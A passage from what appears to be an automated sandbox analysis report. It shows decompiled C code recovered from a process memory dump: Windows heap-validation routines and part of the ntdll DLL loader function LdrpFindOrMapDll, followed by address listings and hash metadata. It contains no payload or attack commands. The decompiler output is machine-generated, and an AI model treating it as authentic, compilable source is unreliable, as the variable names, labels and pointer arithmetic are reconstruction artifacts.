						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E0097373B();
							} else {
								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E0097373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E0097373B();
							} else {
								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E0097373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0xa092a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E0091FAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E009CF8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E009B579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = L009CFDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E00934167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E0097373B();
								} else {
									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E0097373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E0097373B();
							} else {
								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E0097373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E0097373B();
						} else {
							E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E0097373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E0097373B();
					} else {
						E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}












































                                                                                                                                                    0x009d098e
                                                                                                                                                    0x009d0999
                                                                                                                                                    0x009d09a0
                                                                                                                                                    0x009d09a3
                                                                                                                                                    0x009d09a6
                                                                                                                                                    0x009d09b0
                                                                                                                                                    0x009d0e2c
                                                                                                                                                    0x009d0e2f
                                                                                                                                                    0x009d0e34
                                                                                                                                                    0x009d0e38
                                                                                                                                                    0x009d0e3e
                                                                                                                                                    0x009d0e51
                                                                                                                                                    0x009d0e51
                                                                                                                                                    0x009d0c22
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0c22
                                                                                                                                                    0x009d09ba
                                                                                                                                                    0x009d09c9
                                                                                                                                                    0x009d09cb
                                                                                                                                                    0x009d09d1
                                                                                                                                                    0x009d09d3
                                                                                                                                                    0x009d09d6
                                                                                                                                                    0x009d0a47
                                                                                                                                                    0x009d0a01
                                                                                                                                                    0x009d0a03
                                                                                                                                                    0x009d0a06
                                                                                                                                                    0x009d0a09
                                                                                                                                                    0x009d0a0c
                                                                                                                                                    0x009d0a0f
                                                                                                                                                    0x009d0aa7
                                                                                                                                                    0x009d0aaa
                                                                                                                                                    0x009d0aae
                                                                                                                                                    0x009d0ad0
                                                                                                                                                    0x009d0ad5
                                                                                                                                                    0x009d0ab0
                                                                                                                                                    0x009d0ac8
                                                                                                                                                    0x009d0acd
                                                                                                                                                    0x009d0adb
                                                                                                                                                    0x009d0ae4
                                                                                                                                                    0x009d0aec
                                                                                                                                                    0x009d0aec
                                                                                                                                                    0x009d0af0
                                                                                                                                                    0x009d0afe
                                                                                                                                                    0x009d0b04
                                                                                                                                                    0x009d0b04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0af0
                                                                                                                                                    0x009d0a15
                                                                                                                                                    0x009d0a18
                                                                                                                                                    0x009d0a1c
                                                                                                                                                    0x009d0b11
                                                                                                                                                    0x009d0b14
                                                                                                                                                    0x009d0b18
                                                                                                                                                    0x009d0b3a
                                                                                                                                                    0x009d0b3f
                                                                                                                                                    0x009d0b1a
                                                                                                                                                    0x009d0b32
                                                                                                                                                    0x009d0b37
                                                                                                                                                    0x009d0b4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0b51
                                                                                                                                                    0x009d0a25
                                                                                                                                                    0x009d0a27
                                                                                                                                                    0x009d0a2a
                                                                                                                                                    0x009d0a2d
                                                                                                                                                    0x009d0a36
                                                                                                                                                    0x009d0a3c
                                                                                                                                                    0x009d0a3c
                                                                                                                                                    0x009d0a3c
                                                                                                                                                    0x009d0a3e
                                                                                                                                                    0x009d0a3e
                                                                                                                                                    0x009d0a3e
                                                                                                                                                    0x009d0a41
                                                                                                                                                    0x009d0a41
                                                                                                                                                    0x009d0a60
                                                                                                                                                    0x009d0a63
                                                                                                                                                    0x009d0a6d
                                                                                                                                                    0x009d0a6f
                                                                                                                                                    0x009d0a77
                                                                                                                                                    0x009d0a78
                                                                                                                                                    0x009d0a7d
                                                                                                                                                    0x009d0a87
                                                                                                                                                    0x009d0a91
                                                                                                                                                    0x009d0a91
                                                                                                                                                    0x009d0a87
                                                                                                                                                    0x009d0a94
                                                                                                                                                    0x009d0a9a
                                                                                                                                                    0x009d0bf0
                                                                                                                                                    0x009d0b54
                                                                                                                                                    0x009d0b58
                                                                                                                                                    0x009d0b5b
                                                                                                                                                    0x009d0b60
                                                                                                                                                    0x009d0b6a
                                                                                                                                                    0x009d0b6d
                                                                                                                                                    0x009d0b6f
                                                                                                                                                    0x009d0b71
                                                                                                                                                    0x009d0b72
                                                                                                                                                    0x009d0b73
                                                                                                                                                    0x009d0b73
                                                                                                                                                    0x009d0b6d
                                                                                                                                                    0x009d0b78
                                                                                                                                                    0x009d0b7b
                                                                                                                                                    0x009d0b7d
                                                                                                                                                    0x009d0bc1
                                                                                                                                                    0x009d0bc1
                                                                                                                                                    0x009d0bc5
                                                                                                                                                    0x009d0bd2
                                                                                                                                                    0x009d0bd2
                                                                                                                                                    0x009d0bd6
                                                                                                                                                    0x009d0be0
                                                                                                                                                    0x009d0be6
                                                                                                                                                    0x009d0be6
                                                                                                                                                    0x009d0be6
                                                                                                                                                    0x009d0be8
                                                                                                                                                    0x009d0bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0bea
                                                                                                                                                    0x009d0bc9
                                                                                                                                                    0x009d0bce
                                                                                                                                                    0x009d0bd0
                                                                                                                                                    0x009d0c0a
                                                                                                                                                    0x009d0c0e
                                                                                                                                                    0x009d0c19
                                                                                                                                                    0x009d0c1f
                                                                                                                                                    0x009d0c1f
                                                                                                                                                    0x009d0c1f
                                                                                                                                                    0x009d0c1f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0c0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0b7f
                                                                                                                                                    0x009d0b7f
                                                                                                                                                    0x009d0b83
                                                                                                                                                    0x009d0b86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0b88
                                                                                                                                                    0x009d0b8d
                                                                                                                                                    0x009d0ba3
                                                                                                                                                    0x009d0ba8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0baa
                                                                                                                                                    0x009d0bb1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0bb3
                                                                                                                                                    0x009d0bb6
                                                                                                                                                    0x009d0bbc
                                                                                                                                                    0x009d0bbf
                                                                                                                                                    0x009d0bbf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0bbf
                                                                                                                                                    0x009d0b8f
                                                                                                                                                    0x009d0b94
                                                                                                                                                    0x009d0b99
                                                                                                                                                    0x009d0b9c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0b9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0b9e
                                                                                                                                                    0x009d0b7d
                                                                                                                                                    0x009d0bf8
                                                                                                                                                    0x009d0bfc
                                                                                                                                                    0x009d0c00
                                                                                                                                                    0x009d0c06
                                                                                                                                                    0x009d0c51
                                                                                                                                                    0x009d0c42
                                                                                                                                                    0x009d0c47
                                                                                                                                                    0x009d0c49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0c4f
                                                                                                                                                    0x009d0c4f
                                                                                                                                                    0x009d0c55
                                                                                                                                                    0x009d0c58
                                                                                                                                                    0x009d0c5e
                                                                                                                                                    0x009d0cb3
                                                                                                                                                    0x009d0cb6
                                                                                                                                                    0x009d0cff
                                                                                                                                                    0x009d0d04
                                                                                                                                                    0x009d0d06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d08
                                                                                                                                                    0x009d0d0e
                                                                                                                                                    0x009d0d10
                                                                                                                                                    0x009d0d2e
                                                                                                                                                    0x009d0d2e
                                                                                                                                                    0x009d0d34
                                                                                                                                                    0x009d0d36
                                                                                                                                                    0x009d0d60
                                                                                                                                                    0x009d0d6f
                                                                                                                                                    0x009d0d72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d72
                                                                                                                                                    0x009d0d38
                                                                                                                                                    0x009d0d41
                                                                                                                                                    0x009d0d42
                                                                                                                                                    0x009d0d44
                                                                                                                                                    0x009d0d47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d49
                                                                                                                                                    0x009d0d4c
                                                                                                                                                    0x009d0d4c
                                                                                                                                                    0x009d0d4f
                                                                                                                                                    0x009d0d52
                                                                                                                                                    0x009d0d55
                                                                                                                                                    0x009d0d58
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d5a
                                                                                                                                                    0x009d0d5b
                                                                                                                                                    0x009d0d5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d5e
                                                                                                                                                    0x009d0ddb
                                                                                                                                                    0x009d0dde
                                                                                                                                                    0x009d0de1
                                                                                                                                                    0x009d0e03
                                                                                                                                                    0x009d0e08
                                                                                                                                                    0x009d0de3
                                                                                                                                                    0x009d0dfb
                                                                                                                                                    0x009d0e00
                                                                                                                                                    0x009d0e11
                                                                                                                                                    0x009d0e14
                                                                                                                                                    0x009d0e15
                                                                                                                                                    0x009d0e17
                                                                                                                                                    0x009d0e17
                                                                                                                                                    0x009d0e1a
                                                                                                                                                    0x009d0e1d
                                                                                                                                                    0x009d0e24
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0e29
                                                                                                                                                    0x009d0d14
                                                                                                                                                    0x009d0d14
                                                                                                                                                    0x009d0d15
                                                                                                                                                    0x009d0d15
                                                                                                                                                    0x009d0d18
                                                                                                                                                    0x009d0d1b
                                                                                                                                                    0x009d0d1e
                                                                                                                                                    0x009d0d21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d23
                                                                                                                                                    0x009d0d24
                                                                                                                                                    0x009d0d29
                                                                                                                                                    0x009d0d2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d2c
                                                                                                                                                    0x009d0d86
                                                                                                                                                    0x009d0d89
                                                                                                                                                    0x009d0d8c
                                                                                                                                                    0x009d0dae
                                                                                                                                                    0x009d0db3
                                                                                                                                                    0x009d0d8e
                                                                                                                                                    0x009d0da6
                                                                                                                                                    0x009d0dab
                                                                                                                                                    0x009d0dbf
                                                                                                                                                    0x009d0dc2
                                                                                                                                                    0x009d0dcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0dd0
                                                                                                                                                    0x009d0cbe
                                                                                                                                                    0x009d0cc1
                                                                                                                                                    0x009d0cc5
                                                                                                                                                    0x009d0ce7
                                                                                                                                                    0x009d0cec
                                                                                                                                                    0x009d0cc7
                                                                                                                                                    0x009d0cdf
                                                                                                                                                    0x009d0ce4
                                                                                                                                                    0x009d0cf2
                                                                                                                                                    0x009d0cf5
                                                                                                                                                    0x009d0cf8
                                                                                                                                                    0x009d0ca3
                                                                                                                                                    0x009d0ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0ca8
                                                                                                                                                    0x009d0c6d
                                                                                                                                                    0x009d0c8f
                                                                                                                                                    0x009d0c94
                                                                                                                                                    0x009d0c6f
                                                                                                                                                    0x009d0c87
                                                                                                                                                    0x009d0c8c
                                                                                                                                                    0x009d0c9a
                                                                                                                                                    0x009d0c9b
                                                                                                                                                    0x009d0c9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d77
                                                                                                                                                    0x009d0d77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d77

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                                                                    • API String ID: 0-3316276410
                                                                                                                                                    • Opcode ID: 530798fa8c0ab87fd30604c587608fbce6aae08c6442a4b66bbe231d626d05b3
                                                                                                                                                    • Instruction ID: fc4c32d987f2433eb9dd27dcdcd72e593301a96bfe7da2661c2fec47e9384c0d
                                                                                                                                                    • Opcode Fuzzy Hash: 530798fa8c0ab87fd30604c587608fbce6aae08c6442a4b66bbe231d626d05b3
                                                                                                                                                    • Instruction Fuzzy Hash: 67F1E171640685AFDB24CF64C480FAAB7F9FF84714F54C45AE8899B782C734AE44DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0093E6C1, Relevance: 10.6, Strings: 8, Instructions: 626COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0093E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t288;
				signed int _t290;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr _t324;
				signed int _t328;
				intOrPtr _t331;
				intOrPtr* _t332;
				signed short _t333;
				signed int _t336;
				intOrPtr _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed short* _t388;
				signed short* _t390;
				signed int _t391;
				signed int _t401;
				intOrPtr _t403;
				intOrPtr* _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t414;
				intOrPtr* _t416;
				signed int _t417;
				intOrPtr* _t418;
				void* _t419;
				void* _t421;
				void* _t422;

				_push(0xb4);
				_push(0x92be58);
				L0092DF5C(__ebx, __edi, __esi);
				_t254 =  *0x92f78c; // 0x8
				_t416 =  *((intOrPtr*)(_t421 + 0xc));
				if(( *0xa077a0 & (_t254 | 0x00000001)) != 0) {
					_push(_t416);
					L0099F970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
					_t422 = _t422 + 0x1c;
				}
				_t257 =  *0xa077a0; // 0x0
				if(( *0x92f790 & _t257) != 0) {
					asm("int3");
				}
				_t410 = 0;
				 *(_t421 - 0x24) = 0;
				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
				 *(_t421 - 0x28) = 0;
				 *(_t421 + 0xf) = 0;
				_t401 = 0;
				if( *(_t421 + 0x18) != 0) {
					_t258 = L0092FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
					__eflags = _t258;
					if(_t258 != 0) {
						goto L13;
					}
					_t411 = L00941A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
					__eflags = _t411;
					if(_t411 < 0) {
						goto L14;
					}
					_t411 = L00941AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
					__eflags = _t411;
					if(_t411 < 0) {
						E0092E1C6(_t421 - 0x3c);
						goto L14;
					}
					 *(_t421 - 0x24) = 0x10000000;
					goto L84;
				} else {
					_t388 =  *(_t421 + 8);
					_t402 = _t388[2];
					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
					while(_t390 >= _t402) {
						_t406 =  *_t390 & 0x0000ffff;
						if(_t406 == 0x5c || _t406 == 0x2f) {
							 *(_t421 + 0xf) = 1;
							break;
						} else {
							_t390 = _t390;
							continue;
						}
					}
					__eflags =  *(_t421 + 0xf);
					if( *(_t421 + 0xf) == 0) {
						_t391 = L0092FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
						__eflags = _t391;
						if(_t391 != 0) {
							L13:
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							__eflags = 0;
							L14:
							_t260 =  *0x92f798; // 0x8
							_t261 = _t260 | 0x00000001;
							__eflags =  *0xa077a0 & _t261;
							if(( *0xa077a0 & _t261) != 0) {
								L0099F970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
							}
							_t263 =  *0xa077a0; // 0x0
							__eflags =  *0x92f79c & _t263;
							if(( *0x92f79c & _t263) != 0) {
								asm("int3");
							}
							return L0092DFA1(_t411);
						}
						_t411 = L0093FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
						__eflags = _t411;
						if(_t411 < 0) {
							__eflags = _t411 - 0xc0000135;
							if(_t411 == 0xc0000135) {
								_t410 = 0;
								goto L10;
							}
							goto L14;
						}
						L19:
						_t290 = E0092E893(_t421 - 0x48, 0x93ed64, 1);
						__eflags = _t290;
						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
						_t411 = L0093BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
						_t401 = 0;
						__eflags = _t411;
						if(__eflags < 0) {
							L29:
							E0091F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0x28) - _t401;
							if( *(_t421 - 0x28) == _t401) {
								L32:
								E0092E025(_t402,  *0xa00104, 0,  *((intOrPtr*)(_t421 - 0x30)));
								goto L14;
							}
							L30:
							E0091F9F0( *(_t421 - 0x28));
							L31:
							E0092E1C6(_t421 - 0x3c);
							goto L32;
						}
						 *(_t421 + 0x18) = _t411;
						_push(_t421 - 0x20);
						_push(0);
						_push( *((intOrPtr*)(_t421 - 0x54)));
						_push( *((intOrPtr*)(_t421 - 0x1c)));
						_push(0);
						_t411 = E0092F535(_t411, _t416, __eflags);
						__eflags = _t411;
						if(_t411 < 0) {
							L28:
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E0091FC90(0xffffffff);
							goto L29;
						}
						__eflags =  *(_t421 + 0xf);
						if( *(_t421 + 0xf) != 0) {
							_t299 = E00941603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t299;
							if(_t299 == 0) {
								goto L22;
							}
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							goto L28;
						}
						L22:
						__eflags =  *0xa000d8 - 0x2000;
						if( *0xa000d8 == 0x2000) {
							_t402 = 0x10b;
							_t300 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
								goto L23;
							}
							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
								goto L23;
							}
							_push(_t401);
							_push(0x30);
							_push(_t421 - 0xc4);
							_push(1);
							E00920060( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0xa1) & 0x00000008;
							if(__eflags == 0) {
								goto L23;
							}
							 *(_t421 - 4) = _t401;
							_t411 = L009A5F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
							 *(_t421 - 0x70) = _t411;
							 *(_t421 - 4) = 0xfffffffe;
							__eflags = _t411 - _t401;
							if(_t411 >= _t401) {
								goto L23;
							} else {
								goto L28;
							}
						}
						L23:
						_t417 = E0092F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
						 *(_t421 - 0x58) = _t417;
						__eflags = _t417 - _t401;
						if(_t417 != _t401) {
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
								goto L24;
							}
							_t380 = E0095855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							_t411 = _t380;
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							} else {
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
								 *(_t421 + 0x18) = _t380;
								goto L24;
							}
							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
